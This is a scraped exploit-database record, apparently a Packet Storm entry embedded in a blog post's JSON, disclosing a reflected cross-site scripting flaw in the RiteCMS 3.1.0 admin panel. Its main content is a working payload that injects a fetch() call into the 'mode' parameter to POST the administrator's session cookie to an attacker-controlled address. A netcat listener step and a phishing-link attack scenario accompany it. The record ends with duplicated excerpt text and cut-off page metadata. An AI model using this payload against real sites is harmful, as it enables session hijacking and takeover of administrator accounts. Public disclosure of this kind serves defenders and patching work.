{“lastseen”:”2025-10-28T16:48:13″,”description”:”RiteCMS………………………………………………”,”published”:”2025-10-28T00:00:00″,”modified”:”2025-10-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 RiteCMS 3.1.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:210975″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”## Exploit Title: RiteCMS 3.1.0 – Reflected XSS in Admin Panel\\n ## Date: October 28, 2025\\n ## Exploit Author: Chokri Hammedi\\n ## Vendor Homepage: https:\/\/ritecms.com\/\\n ## Software Link: https:\/\/github.com\/ritecms\/ritecms\\n ## Version: RiteCMS 3.1.0\\n ## Tested on: windows xp\\n \\n ## Vulnerability Description:\\n Reflected Cross-Site Scripting (XSS) vulnerability in the `mode` parameter\\n of the admin panel allows attackers to steal admin session cookies and\\n compromise the admin account.\\n \\n ## Proof of Concept:\\n \\n ### Alert Proof of Concept:\\n “`http\\n http:\/\/ritecms.local\/admin.php?mode=’);alert(‘XSS’);\/\/\\n “`\\n \\n ### Cookie Stealing Payload:\\n “`http\\n http:\/\/ritecms.local\/admin.php?mode=’);fetch(‘http:\/\/192.168.1.103:8082\/steal\\n ‘,{method:’POST’,body:JSON.stringify({cookie:document.cookie,url:window.location.href})});\/\/\\n “`\\n \\n ## Attack Scenario:\\n 1. Attacker sets up listener: `nc -lvnp 8082`\\n 2. Attacker sends malicious link to admin\\n 3. Admin clicks link, session cookie is sent to attacker\\n 4. Attacker uses stolen session to gain admin access”,”sourceHref”:”https:\/\/packetstorm.news\/download\/210975″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/210975\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-28T16:48:13″,”description”:”RiteCMS………………………………………………”,”published”:”2025-10-28T00:00:00″,”modified”:”2025-10-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 RiteCMS 3.1.0 Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:210975″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”## Exploit Title: RiteCMS 3.1.0 – Reflected XSS in Admin Panel\\n ## Date: October 28, 2025\\n ## Exploit Author: Chokri…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-23738","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n